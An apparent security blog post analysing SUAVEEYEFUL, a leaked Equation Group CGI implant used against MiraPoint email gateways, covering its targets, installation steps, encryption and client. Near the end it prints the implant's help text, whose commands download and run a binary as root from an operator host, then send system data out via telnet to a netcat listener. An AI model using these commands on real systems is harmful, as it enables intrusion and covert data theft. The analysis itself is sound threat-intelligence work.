<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP | xorl %eax, %eax</title>
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP" />
<meta property="og:url" content="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/" />
<meta property="og:description" content="I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what …" />
<meta property="article:published_time" content="2022-06-22T07:19:17+00:00" />
<meta property="article:modified_time" content="2022-06-22T07:57:01+00:00" />
<meta property="og:site_name" content="xorl %eax, %eax" />
<meta property="og:image" content="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=1200" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="580" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta property="fb:app_id" content="249643311490" />
<meta property="article:publisher" content="https://www.facebook.com/WordPresscom" />
<meta name="twitter:text:title" content="The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION&nbsp;GROUP" />
<meta name="twitter:image" content="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
</head>

<body class="post-template-default single single-post postid-5412 single-format-standard customizer-styles-applied highlander-enabled highlander-light">
<div id="container" class="group">

<h1><a href="https://xorl.wordpress.com/">xorl %eax, %eax</a></h1>

<div id="content" class="group">
<div class="post-5412 post type-post status-publish format-standard hentry category-reverse-engineering category-threat-intelligence">
	<h2 id="post-5412">The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION&nbsp;GROUP</h2>
	
	<div class="main">
		
<p>I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled <a href="https://github.com/x0rz/EQGRP/tree/master/archive_files/suaveeyeful_i386-unknown-mirapoint3.4.3">suaveeyeful_i386-unknown-mirapoint3.4.3</a> and it reveals lots of interesting details. In summary:</p>



<ul><li>SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux</li><li>SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s</li><li>The leaked file/operation was targeting MiraPoint email products</li><li>SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware </li></ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5416" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/mirapoint/" data-orig-file="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg" data-orig-size="606,224" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="mirapoint" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=606" src="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=606" alt="" class="wp-image-5416" srcset="https://xorl.files.wordpress.com/2022/06/mirapoint.jpg 606w, https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/mirapoint.jpg?w=300 300w" sizes="(max-width: 606px) 100vw, 606px" /></figure></div>


<p><strong><span style="text-decoration:underline;">The Leaked Files</span></strong></p>



<p>In that directory there are a few different files. Those are:</p>



<ul><li><strong>bdes</strong>: A copy of the <a href="https://www.freebsd.org/cgi/man.cgi?format=html&amp;query=bdes(1)">FreeBSD bdes</a> (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD <em>bdes</em> version 1.3.2.1 (from 22 Sep. 2000), but compiled on Linux in 2003.</li></ul>



<ul><li><strong>decode-base64</strong>: Simple Perl decoding script using <a href="https://metacpan.org/pod/MIME::Base64">MIME::Base64</a>.</li></ul>



<ul><li><strong>implant</strong>: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).</li></ul>



<ul><li><strong>implant.mg1.waseda.ac.jp</strong>: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University&#8217;s email gateway (variant of the <em>implant</em> file).</li></ul>



<ul><li><strong>opscript.se</strong>: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.</li></ul>



<ul><li><strong>se</strong>: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.</li></ul>



<ul><li><strong>se.old:</strong> Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.</li></ul>



<ul><li><strong>uriescape</strong>: Simple Perl script using <a href="https://metacpan.org/pod/URI::Escape">URI::Escape</a>.</li></ul>



<p>The utilities (<em>bdes</em>, <em>decode-base64</em> and <em>uriescape</em>) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like <em>ls</em>, <em>cat</em>, <em>telnet</em>, etc.)</p>



<figure class="wp-block-image size-large"><img data-attachment-id="5419" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_files/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_files.jpg" data-orig-size="1208,330" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_files" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=1024" alt="" class="wp-image-5419" srcset="https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_files.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_files.jpg 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory</em></figcaption></figure>



<p><strong><span style="text-decoration:underline;">Targets</span></strong></p>



<p>The <em>se.old</em> client was potentially the one the operators were adapting for their new target. This assessment rests on inconsistencies in its content, which make it look like a draft/edited version of an old operation. A leftover comment identifies mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.</p>



<p>This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even today, this IP address (202.99.26.6) still points to an email server from China&#8217;s MFA. It&#8217;s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, which date the tooling rather than the intrusion itself, we can assess that it was at least since the early 2000s.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5421" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_cn_mfa_now/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg" data-orig-size="1170,717" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_cn_mfa_now" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=1024" alt="" class="wp-image-5421" srcset="https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_cn_mfa_now.jpg 1170w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>The current website hosted on mail.mfa.gov.cn</em></figcaption></figure></div>


<p>Most of the files included in the leaked directory were designed for another target: the email gateways of the Waseda Research University, which, <a href="https://www.waseda.jp/top/en/research">according to its official website</a>, &#8220;strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.&#8221;</p>



<p>The <em>se</em> client had two compromised Waseda email gateways configured, and both were accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda&#8217;s infrastructure were compromised by the EQUATION GROUP since at least 2003.</p>



<ul><li>mp450 (10.1.2.208)</li><li>mg1.waseda.ac.jp (10.9.4.15)</li><li>10.1.2.150 &#8211; <em>another compromised host</em></li></ul>



<p>The top host (<em>mp450</em>) was the university&#8217;s MiraPoint 450 (later renamed to <a href="https://www.digi-link.com.hk/datasheet/antispam/razorgate/razorgate450/datasheet_450.pdf">RazorGate 450</a>), an email security appliance. The other host (<em>mg1.waseda.ac.jp</em>) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of <em>mp450</em>) we can deduce that it was likely a system located in the university&#8217;s DMZ network segment.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5436" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_connect_back_cmd/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg" data-orig-size="1498,722" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_connect_back_cmd" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=1024" alt="" class="wp-image-5436" srcset="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg 1498w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Simplified visualisation of the SUAVEEYEFUL installation process</em></figcaption></figure></div>


<p></p>



<p><strong><span style="text-decoration:underline;">Installation of SUAVEEYEFUL in Waseda&#8217;s MiraPoint Servers</span></strong></p>



<p>This is clearly described in the <em>opscript.se</em> file, and we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:</p>



<ol><li>Copy the <em>implant</em> to the <em>/var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi</em> file</li><li>Change <em>nph-help.cgi</em>&#8217;s file permissions to 555</li><li>Change <em>nph-help.cgi</em>&#8217;s ownership to &#8220;root&#8221; with group &#8220;nobody&#8221;</li><li>Use <em>touch -r</em> to ensure that the <em>nph-help.cgi</em> file, as well as anything under the <em>/var/www/data/help/apps/locale/ja_JP.utf-8/utilities/</em> directory, has the same timestamps as the legitimate <em>/var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html</em> file of the MiraPoint web service (<em>touch -r</em> copies only the access and modification times; the inode change time is still updated, so a comparison of change times or file hashes against a known-good baseline is not affected by this step)</li><li>Use <em>netcat</em> to start a listener on port 4444, decoding the received data with Base64 and decrypting them using <em>bdes</em> with a hardcoded key (<em>0x4790cae5ec154ccc</em> in this case)</li><li>Connect-back from <em>mp450</em>&#8217;s SUAVEEYEFUL implant to the listening 4444 port and provide some basic system information (who is logged in, list files/directories, etc.)</li></ol>



<p><strong><span style="text-decoration:underline;">The SUAVEEYEFUL Software Implant</span></strong></p>



<p>SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple <a href="https://en.wikipedia.org/wiki/Common_Gateway_Interface">CGI</a> program written in C for FreeBSD that looks for input at its <em>help</em> endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the <em><a href="https://www.freebsd.org/cgi/man.cgi?system(3)">system()</a></em> library call, as long as they match the defined format (described later in this post).</p>



<p>The client side ensures that all requests are properly formed, encoded (using Base64) and encrypted (with DES). The client supported 4 options:</p>



<ul><li><strong>-h</strong>: Display help message</li><li><strong>-c</strong>: Execute command</li><li><strong>-i</strong>: Input target (e.g. the URL of a host running the SE server component)</li><li><strong>-k</strong>: Key used for DES encryption</li></ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5427" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_client/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_client.jpg" data-orig-size="3296,1594" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_client" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=1024" alt="" class="wp-image-5427" srcset="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=2048 2048w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=768 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Screenshot of the se client used to target the Waseda University</em></figcaption></figure></div>


<p>As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system&#8217;s /dev/random in the following way:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: bash; title: ; notranslate" title="">
head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'
</pre></div>


<p>The command was then structured with <em>#</em> being used as a separator. The main command to be executed was constructed with this:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: bash; title: ; notranslate" title="">
echo &quot;`head -c 8 /dev/random | hexdump -e '/8 &quot;%016x\n&quot;'`#`date +&quot;%s&quot;`#$cmd&quot;|bdes -k $key &gt; out
</pre></div>


<p>This results in a format that looks like this:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5430" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_structure/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_structure.jpg" data-orig-size="1445,94" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_structure" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=1024" alt="" class="wp-image-5430" srcset="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg 1445w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>


<p>This structure was then encrypted using the hardcoded DES key, and passed through the <em>uriescape</em> tool to ensure that there would be no parsing issues by the receiving MiraPoint web server.</p>



<p>Apart from the above, the client also used the <em>date +&quot;%N&quot;</em> command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5432" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_sending_cmd/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg" data-orig-size="711,159" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_sending_cmd" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=711" alt="" class="wp-image-5432" srcset="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg 711w, https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=300 300w" sizes="(max-width: 711px) 100vw, 711px" /><figcaption><em>The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component</em></figcaption></figure></div>


<p>Lastly, the SE help message displayed three example commands that the operator could use. The three example commands performed the following tasks:</p>



<ol><li>Install fileless malware by doing the following:<ul><li>Create a hidden directory (<em>/tmp/.scsi</em>)</li><li>Use <em>curl</em> to download a binary deceptively named <em>sendmail</em> from the operational host (<em>10.1.2.150:5555/sendmail</em>)</li><li>Run <em>sendmail</em> as root and connect-back to the operational host on a different port (<em>10.1.2.150:9999</em>)</li><li>Remove the <em>sendmail</em> binary file so that it&#8217;s running only in memory, not from the filesystem</li></ul></li><li>Execute commands with connect-back method:<ul><li>Run <em>w</em> followed by <em>ls -l</em> and <em>ls -l /tmp</em> to get the logged-in users and contents of the current and <em>/tmp</em> directories</li><li>Encrypt and encode the output</li><li>Send it to the operational host on its listening port (<em>10.1.2.150:4444</em>)</li><li>The message also guides the operator on how to generate a new DES encryption key</li></ul></li><li>Same as #2 but without the Base64 encoding and DES encryption</li></ol>



<p>Here is the full help message:</p>



<pre class="wp-block-code"><code>1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) &gt; /dev/null 2&gt;&amp;1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444

WARNING
WARNING

DO NOT -burn!!!
Use -exit</code></pre>

	<div class="meta group">
		<div class="signature">
			<p>Written by xorl <span class="edit"></span></p>
			<p>June 22, 2022 at 10:19</p>
		</div>
		<div class="tags">
			<p>Posted in <a href="https://xorl.wordpress.com/category/reverse-engineering/" rel="category tag">reverse engineering</a>, <a href="https://xorl.wordpress.com/category/threat-intelligence/" rel="category tag">threat intelligence</a></p>
					</div>
	</div>
</div>




</div>



		
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/xorl.wordpress.com\/2022\/06\/22\/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group\/":5412};
	</script>
				<script crossorigin='anonymous' type='text/javascript' src='https://s2.wp.com/_static/??-eJzTLy/QTc7PK0nNK9EvyClNz8wr1i+uzCtJrMjITM/IAeKS1CJMEWP94uSizIISoOIM5/yiVL2sYh19yo1yKioFEonFGUDz7HNtDU3NDYwMTCwtTLMA0I5ABA=='></script>
<script type='text/javascript'>
	(function(){
		var corecss = document.createElement('link');
		var themecss = document.createElement('link');
		var corecssurl = "https://s1.wp.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver=3.0.9b";
		if ( corecss.setAttribute ) {
				corecss.setAttribute( "rel", "stylesheet" );
				corecss.setAttribute( "type", "text/css" );
				corecss.setAttribute( "href", corecssurl );
		} else {
				corecss.rel = "stylesheet";
				corecss.href = corecssurl;
		}
		document.head.appendChild( corecss );
		var themecssurl = "https://s2.wp.com/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?m=1363304414h&amp;ver=3.0.9b";
		if ( themecss.setAttribute ) {
				themecss.setAttribute( "rel", "stylesheet" );
				themecss.setAttribute( "type", "text/css" );
				themecss.setAttribute( "href", themecssurl );
		} else {
				themecss.rel = "stylesheet";
				themecss.href = themecssurl;
		}
		document.head.appendChild( themecss );
	})();
	SyntaxHighlighter.config.strings.expandSource = '+ expand source';
	SyntaxHighlighter.config.strings.help = '?';
	SyntaxHighlighter.config.strings.alert = 'SyntaxHighlighter\n\n';
	SyntaxHighlighter.config.strings.noBrush = 'Can\'t find brush for: ';
	SyntaxHighlighter.config.strings.brushNotHtmlScript = 'Brush wasn\'t configured for html-script option: ';
	SyntaxHighlighter.defaults['pad-line-numbers'] = false;
	SyntaxHighlighter.defaults['toolbar'] = false;
	SyntaxHighlighter.all();

	// Infinite scroll support
	if ( typeof( jQuery ) !== 'undefined' ) {
		jQuery( function( $ ) {
			$( document.body ).on( 'post-load', function() {
				SyntaxHighlighter.highlight();
			} );
		} );
	}
</script>
</body>
</html>